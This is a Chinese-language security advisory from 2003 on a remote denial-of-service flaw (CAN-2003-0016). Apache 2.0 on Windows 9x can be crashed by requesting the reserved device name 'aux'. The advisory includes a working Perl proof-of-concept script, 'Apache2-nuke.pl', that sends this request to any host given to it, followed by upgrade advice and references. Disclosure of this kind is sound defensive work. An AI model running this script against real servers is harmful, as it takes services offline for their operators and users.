Apache Web Server设备名远程拒绝服务漏洞发布时间:2003-01-22 更新时间:2003-01-22 严重程度:中 威胁程度:远程拒绝服务 错误类型:意外情况处置错误 利用方式:服务器模式 BUGTRAQ ID:6662 CVE(CAN) ID:CAN-2003-0016 受影响系统 Apache Software Foundation Apache 2.0.36详细描述 Apache WEB服务程序是流行的HTTP程序,可使用在UNIX和WINDOWS操作系统上。 WINDOWS 9X系统下的APACHE WEB服务程序由于ap_directory_walk的错误检查,通过请求保留设备"aux"可导致WEB浏览器产生拒绝服务。 测试代码 --- Apache2-nuke.pl --- #!/usr/bin/perl use IO::Socket; if (@ARGV < 1 || @ARGV > 2) { print STDOUT "Usage: perl $0 <host> <port=80>"; exit; } if (@ARGV == 2) { $port = $ARGV[1]; } else { $port = 80; } $f = IO::Socket::INET->new(Proto=>"tcp", PeerHost=>$ARGV[0], PeerPort=>$port); print $f "GET /aux HTTP/1.0\r\n\r\n"; --- Apache2-nuke.pl --- 解决方案 升级程序: Apache Software Foundation Apache 2.0.36: Apache Software Foundation Upgrade Apache httpd 2.0.44 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.37: Apache Software Foundation Upgrade Apache httpd 2.0.44 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.38: Apache Software Foundation Upgrade Apache httpd 2.0.44 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.39: Apache Software Foundation Upgrade Apache httpd 2.0.44 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.40: Apache Software Foundation Upgrade Apache httpd 2.0.44 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.41: Apache Software Foundation Upgrade Apache httpd 2.0.44 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.42: Apache Software Foundation Upgrade Apache httpd 2.0.44 http://www.apache.org/dist/httpd/ Apache Software Foundation Apache 2.0.43: Apache Software Foundation Upgrade Apache httpd 2.0.44 http://www.apache.org/dist/httpd/ 相关信息 参考:http://www.apache.org/dist/httpd/Announcement2.html http://www.apache.org/dist/httpd/CHANGES_2.0 http://lists.netsys.com/pipermail/full-disclosure/2003-January/003653.html |
